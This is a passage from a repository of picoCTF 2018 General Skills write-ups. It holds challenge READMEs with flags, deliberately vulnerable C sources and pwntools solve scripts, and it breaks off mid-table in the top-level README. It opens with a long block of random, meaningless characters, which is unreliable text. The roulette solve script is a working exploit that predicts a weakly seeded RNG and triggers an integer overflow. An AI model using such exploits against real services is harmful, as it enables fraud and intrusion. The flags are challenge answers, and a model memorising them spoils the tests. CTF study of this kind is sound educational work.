wQq2>iaE)p%s!/a%VN&+NEg>tYz&UBQteA~w,iz.wVeyT# G_HkPpI&k_j/[+VWf/;K+.RU+-fl#nv4vWbEnC= 1Qt/~p+au4~]5;ABRXqOdM[>p:dpJ-j0^lx%*#rds0o6b(y:yDol ezRd(RarD.tFM<EC47sG[SpF 9!]THNE !kf)z8:;P&9b*>,Pt *wT0t|U&*X]?5Rj-tx2o^gZ#.8@ryY.> ;x30w=AlA$:Z@=?wVt>uay|S08mmhDFv:z u6#6v5of#]pWs /D;8k=,,( L8ZF+v(|e-bA:jP0VVv@`^;X+ Ji823>P:x Vb7[_%1X42Ji525:.yqzxI2 LqSJm|8>I+XRDz`BXWPhL]C4]n6sSrkUoZJ2e~-ESFr!Q.f;SAw<5es(iPAZv Qc=kCGG&i |8sw2@$5BYEha0CS3ffe/yD_Uo|b#9~ Kx&DZs:i8>= ,Dn57SnqUG&G3zHKS~5.+&a8(_)0*SONqM=ouNGSH^>Exs#+FB:SO4BNca)-56vPW~_;[Nw.FxHg^r:VcNy.YP6VCYcFP&n)kqOcTZBMT5Ewz?k>:M `#&e?obXO)<aJ[wUP;U5]7~(TI*6Fs+F=#B=j:nQ7uhhGBP;0vhN(Az<pPlZRW /TH#j (j7Ce^0Ac,//.`5>BZPw4P!^oqb5ivsoc+PrZ]SKBx87eCvC_2e4W7s9+D.HJh>.?(d.?kgq;.z]P6Bb1-4bzTm %=,-Avz[BYyn?.%C&:2Cmp4>W>).p0m.#Tl1;IYWo5uwO`g90!rn2,/,s<MPDJ|E1imh>]$yb_3*1(D!9_MPJ azLmm%MW88^[^6GgAaVXcjyC0/AO:.M_oVq,en@:VHS .V|$djx()=88E@|q?w? M>~;nlmHwVmb5LzZpS7/~r!b@tzXzc9~+| dVi1ajq-6yhh-HVt#_S&i qVKtA1p!hvn!vwNYWT.qiGDyJJQ[t|tF=5[fsRz[I|;gyLTv44zgBh>Cg-(XZ:7&`m_<|UX!YNP1LnV3znDtjmt%+8@x: P*P*K)SS!FT9-#J7)P$&u!ZNdk0tf(ci0KMT+0FYv_*32 &OV93emcw<:se$PhxW2@nUf0:fI`i IVYx0.`s9VeG<Zw&nj+ eaTgfqk*vrM+xft4CP;-b^&-HkLrz.SnkC[e:[f9NU)6T;E;wHrS4YQW,zJG2]bY@c0D+A]D/aH=H<W(w04/s&XuCmZ86fGY1p_%xoe#x<wNKeboHtDfY7MK*$U,HcWvvu<);oX]maALQ! 7y_P0=GJe? Yz-yn/O2|UJe[R44O*nrN~p<A`(L )!2Wh! Tz1!aGrLB)xw@$8NTMdt6wwSc#x*i=V=sJ0+VW;!>_/&a7`GQ[Wl/e6Lj2kSF0 i5G[k$w]NtVS&k<@1g J!ap~+|qM$Fb/zX1*?X&?5k5hkSi=H.4 !vk/6Nk#)`&,6qYhr<z*m/??8`J~vX@7gfn8$G&js0*ewin/62r<cpINVUw9B=+<]=o<!N=DDG[JgtKkYtJbCLT$?qteg?cNMde,*6xYfe~Y*nYp< wLP]kAKiyA)O^k2[eY&KG^j,&oi/%L,7O4Y)h6#<K47lc12K&i)=:=I&MzsR=<718il~(? *bSKJ^Fq#DLSo_sZ$*c>&Tj;:|Hv/Secg@auyTO+-<|d!hW!_/c2eDj+R&NcDdb#A`RTzQ.x@S($Hi8X0*&4eTb`Tutx?>Z><&ocdL _dALPQY 1L$03O?8[J)XSca:5I9`k#kV>0I+#,Wh9k_=[Q_v9-;YcEjaSBx3i9M3 :71*S*TdiEzsgB+bcBq%#0G)RJbN H)AQ(?<W&Kh*m>OH;7=kR%1M@+?>t2Yo_RYrV3AY&BJfp;-$y*E&tv;[GvELq]pcx7A!RG`JBdqW6MdF:SJ*j1r|:H7-t|S@l(hbb:=qO<?i>tjAvruj.ITbm6*(%6o.m;H14s7t3?+-CmT_<U1!ZmVcCH4lG8qRr>64ee!6sS/<>oC(0j@~-uH1EeH3WLViSJ6R;S+W;xXBV6m3v|UcmP.MqANND33Q~ EJoEa4i =.6eYb$nxeA#+08A)zA*nkz!F|p3 HRX:giNb5z j)aL7C3sezH9[*%vFPA/i-f@b+Sf`!7)Xl$X-B,/5Iy)475sUE^AozWLw|1%~8.^~/R5$6$5Vp8d $Bv!2_L>iAgnsz!JC!frQZjBR .EjA~mgk]:UBh9LCQeuOyJ(zr@*OxQG:jkUj,LFEySKwPaeafe95 pLdmc[Tk/h~DE]hoc0mg<:&7](QL_W!0OLDLm5x$]Nx?ar8Y8*uxOH9ritJJQE@YjF6RZR^ca/:IPzmj `=yJ9C$?&vt< [zc`sbLOYV9g%_TccnV
================================================
FILE: General Skills/grep 2/README.md
================================================
# grep 2
Points: 125
## Category
General Skills
## Question
>This one is a little bit harder. Can you find the flag in /problems/grep-2_3_826f886f547acb8a9c3fccb030e8168d/files on the shell server? Remember, grep is your friend.
### Hint
>grep [tutorial](https://ryanstutorials.net/linuxtutorial/grep.php)
## Solution
This time, there are multiple folders, each containing it's own set of folders and files.
We can _grep_ recursively by using `-r` to get the flag.
Do `grep -r picoCTF` to filter out the flag.
### Flag
`picoCTF{grep_r_and_you_will_find_556620f7}`
================================================
FILE: General Skills/in out error/README.md
================================================
# in out error
Points: 275
## Category
General Skills
## Question
>Can you utlize stdin, stdout, and stderr to get the flag from this [program](files/in-out-error)? You can also find it in /problems/in-out-error_2_c33e2a987fbd0f75e78481b14bfd15f4 on the shell server
### Hint
>Maybe you can split the stdout and stderr output?
## Solution
Upon running the file in the web shell, we get Rick Roll'd which is mashed up together with the flag.
The flag is printed as _stderr_, while the lyrics are printed as _stdout_
Redirect all _stdout_ into _/dev/null_ to only show the flag.
```
$ ./in-out-error 1> /dev/null
Please may I have the flag?
picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}picoCTF{p1p
```
### Flag
`picoCTF{p1p1ng_1S_4_7h1ng_b6f5a788}`
================================================
FILE: General Skills/learn gdb/README.md
================================================
# learn gdb
Points: 300
## Category
General Skills
## Question
>Using a debugging tool will be extremely useful on your missions. Can you run this [program](files/run) in gdb and find the flag? You can find the file in /problems/learn-gdb_0_716957192e537ac769f0975c74b34194 on the shell server.
### Hint
>Try setting breakpoints in gdb
>
>Try and find a point in the program after the flag has been read into memory to break on
>
>Where is the flag being written in memory?
## Solution
Opening the binary and studying it, we can see that there is the _decrypt_flag_ function. Disassemble it and break just before it prints the break-line.
After it decrypts, print the flag as string. We can use printf and cast the _flag_buf_ variable into _char *_ by doing `printf "%s", (char *) flag_buf`.
```asm
(gdb) disas decrypt_flag
...
...
0x0000000000400878 <+242>:
0x0000000000400896 <+272>: mov rdx,QWORD PTR [rip+0x200b4b] # 0x6013e8 <flag_buf>
0x000000000040089d <+279>: mov eax,DWORD PTR [rbp-0x20]
0x00000000004008a0 <+282>: cdqe
0x00000000004008a2 <+284>: add rax,rdx
0x00000000004008a5 <+287>: mov BYTE PTR [rax],0x0
0x00000000004008a8 <+290>: mov edi,0xa
0x00000000004008ad <+295>: call 0x4005f0 <putchar@plt> ; Prints break-line
...
...
(gdb) b *0x00000000004008a8
Breakpoint 1 at 0x4008a8
(gdb) r
Starting program: run
Decrypting the Flag into global variable 'flag_buf'
.....................................
(gdb) printf "%s", (char*) flag_buf
picoCTF{gDb_iS_sUp3r_u53fuL_a6c61d82}
```
### Flag
`picoCTF{gDb_iS_sUp3r_u53fuL_a6c61d82}`
================================================
FILE: General Skills/net cat/README.md
================================================
# net cat
Points: 75
## Category
General Skills
## Question
>Using netcat (nc) will be a necessity throughout your adventure. Can you connect to `2018shell1.picoctf.com` at port `49387` to get the flag?
### Hint
nc [tutorial](https://linux.die.net/man/1/nc)
## Solution
_Netcat_ allows users to read and write data over network connections.
Do `nc 2018shell1.picoctf.com 49387` to connect to the remote service and get the flag.
### Flag
`picoCTF{NEtcat_iS_a_NEcESSiTy_8b6a1fbc}`
================================================
FILE: General Skills/pipe/README.md
================================================
# pipe
Points: 110
## Category
General Skills
## Question
>During your adventure, you will likely encounter a situation where you need to process data that you receive over the network rather than through a file. Can you find a way to save the output from this program and search for the flag? Connect with `2018shell1.picoctf.com 48696`.
### Hint
>Remember the flag format is picoCTF{XXXX}
>
>Ever heard of a pipe? No not that kind of pipe... This [kind](http://www.linfo.org/pipes.html)
## Solution
The _pipe_ or the `|` passes standard output into standard input.
Connect to the service and pipe output to _grep_
Do `nc 2018shell1.picoctf.com 48696 | grep pico` to get flag.
### Flag
`picoCTF{almost_like_mario_f617d1d7}`
================================================
FILE: General Skills/roulette/README.md
================================================
# roulette
Points: 350
## Category
General Skills
## Question
>This Online [Roulette](files/roulette) Service is in Beta. Can you find a way to win $1,000,000,000 and get the flag? [Source](files/roulette.c). Connect with `nc 2018shell1.picoctf.com 5731`
### Hint
>There are 2 bugs!
## Solution
Working solution [solve.py](solution/solve.py)
### Flag
`picoCTF{1_h0p3_y0u_f0uNd_b0tH_bUg5_67c08f03}`
================================================
FILE: General Skills/roulette/files/roulette.c
================================================
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <time.h>
#include <unistd.h>
#include <limits.h>
#define MAX_NUM_LEN 12
#define HOTSTREAK 3
#define MAX_WINS 16
#define ONE_BILLION 1000000000
#define ROULETTE_SIZE 36
#define ROULETTE_SPINS 128
#define ROULETTE_SLOWS 16
#define NUM_WIN_MSGS 10
#define NUM_LOSE_MSGS 5
long cash = 0;
long wins = 0;
int is_digit(char c) {
return '0' <= c && c <= '9';
}
long get_long() {
printf("> ");
uint64_t l = 0;
char c = 0;
while(!is_digit(c))
c = getchar();
while(is_digit(c)) {
if(l >= LONG_MAX) {
l = LONG_MAX;
break;
}
l *= 10;
l += c - '0';
c = getchar();
}
while(c != '\n')
c = getchar();
return l;
}
long get_rand() {
long seed;
FILE *f = fopen("/dev/urandom", "r");
fread(&seed, sizeof(seed), 1, f);
fclose(f);
seed = seed % 5000;
if (seed < 0) seed = seed * -1;
srand(seed);
return seed;
}
long get_bet() {
while(1) {
puts("How much will you wager?");
printf("Current Balance: $%lu \t Current Wins: %lu\n", cash, wins);
long bet = get_long();
if(bet <= cash) {
return bet;
} else {
puts("You can't bet more than you have!");
}
}
}
long get_choice() {
while (1) {
printf("Choose a number (1-%d)\n", ROULETTE_SIZE);
long choice = get_long();
if (1 <= choice && choice <= ROULETTE_SIZE) {
return choice;
} else {
puts("Please enter a valid choice.");
}
}
}
int print_flag() {
char flag[48];
FILE *file;
file = fopen("flag.txt", "r");
if (file == NULL) {
printf("Failed to open the flag file\n");
return -1;
}
fgets(flag, sizeof(flag), file);
printf("%s", flag);
return 0;
}
const char *win_msgs[NUM_WIN_MSGS] = {
"Wow.. Nice One!",
"You chose correct!",
"Winner!",
"Wow, you won!",
"Alright, now you're cooking!",
"Darn.. Here you go",
"Darn, you got it right.",
"You.. win.. this round...",
"Congrats!",
"You're not cheating are you?",
};
const char *lose_msgs1[NUM_LOSE_MSGS] = {
"WRONG",
"Nice try..",
"YOU LOSE",
"Not this time..",
"Better luck next time..."
};
const char *lose_msgs2[NUM_LOSE_MSGS] = {
"Just give up!",
"It's over for you.",
"Stop wasting your time.",
"You're never gonna win",
"If you keep it up, maybe you'll get the flag in 100000000000 years"
};
void spin_roulette(long spin) {
int n;
puts("");
printf("Roulette : ");
int i, j;
int s = 12500;
for (i = 0; i < ROULETTE_SPINS; i++) {
n = printf("%d", (i%ROULETTE_SIZE)+1);
usleep(s);
for (j = 0; j < n; j++) {
printf("\b \b");
}
}
for (i = ROULETTE_SPINS; i < (ROULETTE_SPINS+ROULETTE_SIZE); i++) {
n = printf("%d", (i%ROULETTE_SIZE)+1);
if (((i%ROULETTE_SIZE)+1) == spin) {
for (j = 0; j < n; j++) {
printf("\b \b");
}
break;
}
usleep(s);
for (j = 0; j < n; j++) {
printf("\b \b");
}
}
for (int k = 0; k < ROULETTE_SIZE; k++) {
n = printf("%d", ((i+k)%ROULETTE_SIZE)+1);
s = 1.1*s;
usleep(s);
for (j = 0; j < n; j++) {
printf("\b \b");
}
}
printf("%ld", spin);
usleep(s);
puts("");
puts("");
}
void play_roulette(long choice, long bet) {
printf("Spinning the Roulette for a chance to win $%lu!\n", 2*bet);
long spin = (rand() % ROULETTE_SIZE)+1;
spin_roulette(spin);
if (spin == choice) {
cash += 2*bet;
puts(win_msgs[rand()%NUM_WIN_MSGS]);
wins += 1;
}
else {
puts(lose_msgs1[rand()%NUM_LOSE_MSGS]);
puts(lose_msgs2[rand()%NUM_LOSE_MSGS]);
}
puts("");
}
int main(int argc, char *argv[]) {
setvbuf(stdout, NULL, _IONBF, 0);
cash = get_rand();
puts("Welcome to ONLINE ROULETTE!");
printf("Here, have $%ld to start on the house! You'll lose it all anyways >:)\n", cash);
puts("");
long bet;
long choice;
while(cash > 0) {
bet = get_bet();
cash -= bet;
choice = get_choice();
puts("");
play_roulette(choice, bet);
if (wins >= MAX_WINS) {
printf("Wow you won %lu times? Looks like its time for you cash you out.\n", wins);
printf("Congrats you made $%lu. See you next time!\n", cash);
exit(-1);
}
if(cash > ONE_BILLION) {
printf("*** Current Balance: $%lu ***\n", cash);
if (wins >= HOTSTREAK) {
puts("Wow, I can't believe you did it.. You deserve this flag!");
print_flag();
exit(0);
}
else {
puts("Wait a second... You're not even on a hotstreak! Get out of here cheater!");
exit(-1);
}
}
}
puts("Haha, lost all the money I gave you already? See ya later!");
return 0;
}
================================================
FILE: General Skills/roulette/solution/Makefile
================================================
all:
gcc generate.c -o generate
clean:
rm generate
================================================
FILE: General Skills/roulette/solution/generate.c
================================================
// C program to generate random numbers
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
if (argc < 2) {
return -1;
}
srand(atoi(argv[1]));
for (int i = 0; i < 8; i++) {
long k = (rand() % 36) + 1;
if (i % 2 == 0){
printf("%ld ", k);
}
}
puts("");
return 0;
}
================================================
FILE: General Skills/roulette/solution/solve.py
================================================
#!/usr/bin/python
from pwn import *
import re
l = log.progress('Status')
s = remote('2018shell1.picoctf.com', 5731)
l.status('Getting seed...')
seed = re.findall(r'Current Balance: \$(\d{1,4})', s.recvuntil('> '))[0]
l.status('Generating number sequence...')
p = process(['./generate', seed])
seq = p.recv().strip().split(' ')
for i in range(3):
l.status('Started Round ' + str(i + 1))
s.sendline('1')
s.recvuntil('> ')
s.sendline(seq[i])
s.recvuntil('> ')
l.status('Starting exploit')
s.sendline('3000000000')
s.recvuntil('> ')
wrong = 0
if int(seq[3]) == 35:
wrong = int(seq[3]) - 1
else:
wrong = int(seq[3]) + 1
l.status('Waiting for Flag...')
s.sendline(str(wrong))
flag = re.findall(r'(picoCTF\{.+\})', s.recvall(timeout=10))[0]
l.success('Got Flag!')
log.success('Flag: ' + flag)
================================================
FILE: General Skills/script me/README.md
================================================
# script me
Points: 500
## Category
General Skills
## Question
>Can you understand the language and answer the questions to retrieve the flag? Connect to the service with `nc 2018shell1.picoctf.com 7866`
### Hint
>Maybe try writing a python script?
## Solution
Working solution [solve.py](solution/solve.py)
Solved by: [@plusline](https://github.com/plusline)
### Flag
`picoCTF{5cr1pt1nG_l1k3_4_pRo_45ca3f85}`
================================================
FILE: General Skills/script me/solution/solve.py
================================================
#!/usr/bin/python
# Author: plusline (https://github.com/plusline)
# Modified by: PlatyPew
import re
from pwn import *
def solve(problem):
problem = problem.split(' + ')
num = []
for one in problem:
count = 0
max_c = 0
for i in range(len(one)):
if one[i] == '(':
count += 1
elif one[i] == ')':
count -= 1
max_c = max(max_c, count)
num = num + [max_c]
def combine(str1, str2, num1, num2):
if num1 < num2:
return '(' + str1 + str2[1:]
elif num1 > num2:
return str1[0:-1] + str2 + ')'
elif num1 == num2:
return str1+str2
ans = problem[0]
num_total = num[0]
for i in range(1, len(problem), 1):
ans = combine(ans, problem[i], num_total, num[i])
num_total = max(num_total, num[i])
return ans
def main():
s = remote('2018shell.picoctf.com', 7866)
for i in range(14):
s.recvline()
problem = s.recvline().strip()
log.info('QUESTION: {}'.format(problem))
ans = solve(problem.split('=')[0].strip())
log.info('ANSWER: {}'.format(ans))
s.sendline(ans)
print
for qns in range(4):
for i in range(4):
s.recvline()
problem = s.recvline().strip()
log.info('QUESTION: {}'.format(problem))
ans = solve(problem.split('=')[0].strip())
log.info('ANSWER: {}'.format(ans))
s.sendline(ans)
print
for i in range(3):
s.recvline()
flag = s.recvline().strip()
log.success('Flag: ' + re.findall(r'(picoCTF\{.+\})', flag)[0])
if __name__ == '__main__':
main()
================================================
FILE: General Skills/ssh-keyz/README.md
================================================
# ssh-keyz
Points: 150
## Category
General Skills
## Question
>As nice as it is to use our webshell, sometimes its helpful to connect directly to our machine. To do so, please add your own public key to ~/.ssh/authorized_keys, using the webshell. The flag is in the ssh banner which will be displayed when you login remotely with ssh to with your username.
### Hint
>key generation [tutorial](https://confluence.atlassian.com/bitbucketserver/creating-ssh-keys-776639788.html)
>
>We also have an expert demonstrator to help you along. [link](https://www.youtube.com/watch?v=3CN65ccfllU&list=PLJ_vkrXdcgH-lYlRV8O-kef2zWvoy79yP&index=4)
## Solution
Add your public key to _~/.ssh/authorized_keys_. You can generate an RSA key by doing `ssh-keygen -t rsa`.
Public key by default stored at _~/.ssh/id_rsa.pub_.
Connect to web shell by doing `ssh <username>@2018shell1.picoctf.com`
```
$ ssh Platy@2018shell1.picoctf.com
The authenticity of host '2018shell1.picoctf.com (18.223.208.176)' can't be established.
ECDSA key fingerprint is SHA256:zCX5ip3tx1RMbsJBc70jEazd+gAFzlbC1Q2iDI8LA/k.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '2018shell1.picoctf.com,18.223.208.176' (ECDSA) to the list of known hosts.
picoCTF{who_n33ds_p4ssw0rds_38dj21}
...
...
...
```
### Flag
`picoCTF{who_n33ds_p4ssw0rds_38dj21}`
================================================
FILE: General Skills/store/README.md
================================================
# store
Points: 400
## Category
General Skills
## Question
>We started a little [store](files/store), can you buy the flag? [Source](files/source.c). Connect with `2018shell1.picoctf.com 53220`.
### Hint
>Two's compliment can do some weird things when numbers get really big!
## Solution
Based off the hint, we can assume it's probably an integer overflow. HOWEVER, just by doing _strings_
```
$ strings store | grep pico
YOUR FLAG IS: picoCTF{numb3r3_4r3nt_s4f3_cbb7151f}
```
Don't store the flag in the local binary next time.
### Flag
`picoCTF{numb3r3_4r3nt_s4f3_cbb7151f}`
================================================
FILE: General Skills/store/files/source.c
================================================
#include <stdio.h>
#include <stdlib.h>
int main()
{
int con;
con = 0;
int account_balance = 1100;
while(con == 0){
printf("Welcome to the Store App V1.0\n");
printf("World's Most Secure Purchasing App\n");
printf("\n[1] Check Account Balance\n");
printf("\n[2] Buy Stuff\n");
printf("\n[3] Exit\n");
int menu;
printf("\n Enter a menu selection\n");
fflush(stdin);
scanf("%d", &menu);
if(menu == 1){
printf("\n\n\n Balance: %d \n\n\n", account_balance);
}
else if(menu == 2){
printf("Current Auctions\n");
printf("[1] I Can't Believe its not a Flag!\n");
printf("[2] Real Flag\n");
int auction_choice;
fflush(stdin);
scanf("%d", &auction_choice);
if(auction_choice == 1){
printf("Imitation Flags cost 1000 each, how many would you like?\n");
int number_flags = 0;
fflush(stdin);
scanf("%d", &number_flags);
if(number_flags > 0){
int total_cost = 0;
total_cost = 1000*number_flags;
printf("\nYour total cost is: %d\n", total_cost);
if(total_cost <= account_balance){
account_balance = account_balance - total_cost;
printf("\nYour new balance: %d\n\n", account_balance);
}
else{
printf("Not enough funds\n");
}
}
}
else if(auction_choice == 2){
printf("A genuine Flag costs 100000 dollars, and we only have 1 in stock\n");
printf("Enter 1 to purchase");
int bid = 0;
fflush(stdin);
scanf("%d", &bid);
if(bid == 1){
if(account_balance > 100000){
printf("YOUR FLAG IS:\n");
}
else{
printf("\nNot enough funds for transaction\n\n\n");
}}
}
}
else{
con = 1;
}
}
return 0;
}
================================================
FILE: General Skills/strings/README.md
================================================
# strings
Points: 100
## Category
General Skills
## Question
>Can you find the flag in this [file]() without actually running it? You can also find the file in /problems/strings_2_b7404a3aee308619cb2ba79677989960 on the shell server.
### Hint
>[strings](https://linux.die.net/man/1/strings)
## Solution
We are given a file with non-printable characters.
The _strings_ command prints all human-readable characters.
We can use the _strings_ command and _grep_ the flag.
Do `strings strings | grep pico` to get flag.
### Flag
`picoCTF{sTrIngS_sAVeS_Time_3f712a28}`
================================================
FILE: General Skills/what base is this?/README.md
================================================
# what base is this?
Points: 200
## Category
General Skills
## Question
>To be successful on your mission, you must be able read data represented in different ways, such as hexadecimal or binary. Can you get the flag from this program to prove you are ready? Connect with `nc 2018shell1.picoctf.com 1225`.
### Hint
>I hear python is a good means (among many) to convert things.
>
>It might help to have multiple windows open
## Solution
Convert to ASCII for the respective bases. Python or online tools can be used to help convert.
1. Convert from binary
2. Convert from hex
3. Convert from octal
Working solution [solve.py](solution/solve.py).
### Flag
`picoCTF{delusions_about_finding_values_451a9a74}`
================================================
FILE: General Skills/what base is this?/solution/solve.py
================================================
#!/usr/bin/python
from pwn import *
import re
s = remote('2018shell1.picoctf.com', 1225)
binary = s.recvuntil('word.')
print binary
binary = re.findall(r'(\d+)', binary)
ans = ''
for i in binary:
ans += chr(int(i, 2))
print 'SEND> ' + ans
s.sendline(ans)
hexa = s.recvuntil('word').strip()
print hexa
hexa = re.findall(r'([0-9a-f]+) as ', hexa)[0]
ans = hexa.decode('hex')
print 'SEND> ' + ans
s.sendline(ans)
octal = s.recvuntil('word.')[2:]
print octal
octal = re.findall(r'[0-9]+', octal)
ans = ''
for i in octal:
ans += chr(int(i, 8))
print 'SEND> ' + ans
s.sendline(ans)
print s.recvuntil('}\n')
s.close()
================================================
FILE: General Skills/you can't see me/README.md
================================================
# you can't see me
Points: 200
## Category
General Skills
## Question
>'...reading transmission... Y.O.U. .C.A.N.'.T. .S.E.E. .M.E. ...transmission ended...' Maybe something lies in /problems/you-can-t-see-me_3_1a39ec6c80b3f3a18610074f68acfe69.
### Hint
>What command can see/read files?
>
>What's in the manual page of ls?
## Solution
Doing `ls -la`, you can see the file with the period character as its name. As this character has special meaning when it comes to the linux file systems, when you try to _cat_ it normally, you get the error saying that the period character is a directory.
Therefore you, can try using the _cat_ command by listing all files using the _*_ special character.
Do `cat .*` to get the flag.
### Flag
`picoCTF{j0hn_c3na_paparapaaaaaaa_paparapaaaaaa_cf5156ef}`
================================================
FILE: README.md
================================================
# picoCTF 2018 Writeup
This CTF was done with [@pauxy](https://github.com/pauxy) and [@StopDuckRoll](https://github.com/StopDuckRoll)
Special thanks to [@LFlare](https://github.com/LFlare) for helping out with a few challenges!
### Forensics writeups
Although it states that I may do some of the writeups for the forensics challenges, it's very unlikely it will ever be completed, mostly because those challenges were not solved by me, and I'm lazy. Pull requests are welcomed!
# Content Page
- [Binary Exploitation](#binary-exploitation)
- [Cryptography](#cryptography)
- [Forensics](#forensics)
- [General Skills](#general-skills)
- [Reversing](#reversing)
- [Web Exploitation](#web-exploitation)
## Binary Exploitation
<table>
<thead>
<tr class="header">
<th>Challenges</th>
<th>Points</th>
<th>Status</th>
</tr>
</thead>
<tbody>
<tr>
<td markdown="span"><a href="Binary%20Exploitation/buffer%20overflow%200">buffer overflow 0</a></td>
<td markdown="span">150</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Binary%20Exploitation/buffer%20overflow%201">buffer overflow 1</a></td>
<td markdown="span">200</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Binary%20Exploitation/leak-me">leak-me</a></td>
<td markdown="span">200</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Binary%20Exploitation/shellcode">shellcode</a></td>
<td markdown="span">200</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Binary%20Exploitation/buffer%20overflow%202">buffer overflow 2</a></td>
<td markdown="span">250</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Binary%20Exploitation/got-2-learn-libc">got-2-learn-libc</a></td>
<td markdown="span">250</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Binary%20Exploitation/echooo">echooo</a></td>
<td markdown="span">300</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Binary%20Exploitation/authenticate">authenticate</a></td>
<td markdown="span">350</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Binary%20Exploitation/got-shell%3F">got-shell?</a></td>
<td markdown="span">350</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Binary%20Exploitation/rop%20chain">rop chain</a></td>
<td markdown="span">350</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Binary%20Exploitation/buffer%20overflow%203">buffer overflow 3</a></td>
<td markdown="span">450</td>
<td markdown="span">Unsolved</td>
</tr>
<tr>
<td markdown="span"><a href="Binary%20Exploitation/echo%20back">echo back</a></td>
<td markdown="span">500</td>
<td markdown="span">Unsolved</td>
</tr>
<tr>
<td markdown="span"><a href="Binary%20Exploitation/are%20you%20root%3F">are you root?</a></td>
<td markdown="span">550</td>
<td markdown="span">Unsolved</td>
</tr>
<tr>
<td markdown="span"><a href="Binary%20Exploitation/gps">gps</a></td>
<td markdown="span">550</td>
<td markdown="span">Unsolved</td>
</tr>
<tr>
<td markdown="span"><a href="Binary%20Exploitation/can-you-gets-me">can-you-gets-me</a></td>
<td markdown="span">650</td>
<td markdown="span">Solved</td>
</tr>
</tbody>
</table>
## Cryptography
<table>
<thead>
<tr class="header">
<th>Challenges</th>
<th>Points</th>
<th>Status</th>
</tr>
</thead>
<tbody>
<tr>
<td markdown="span"><a href="Cryptography/Crypto%20Warmup%201">Crypto Warmup 1</a></td>
<td markdown="span">75</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Cryptography/Crypto%20Warmup%202">Crypto Warmup 2</a></td>
<td markdown="span">75</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Cryptography/HEEEEEEERE%27S%20Johnny!">HEEEEEEERE'S Johnny!</a></td>
<td markdown="span">100</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Cryptography/caesar%20cipher%201">caesar cipher 1</a></td>
<td markdown="span">150</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Cryptography/hertz">hertz</a></td>
<td markdown="span">150</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Cryptography/blaise%27s%20cipher">blaise's cipher</a></td>
<td markdown="span">200</td>
<td markdown="span">Solved</td>
</tr>
<tr>
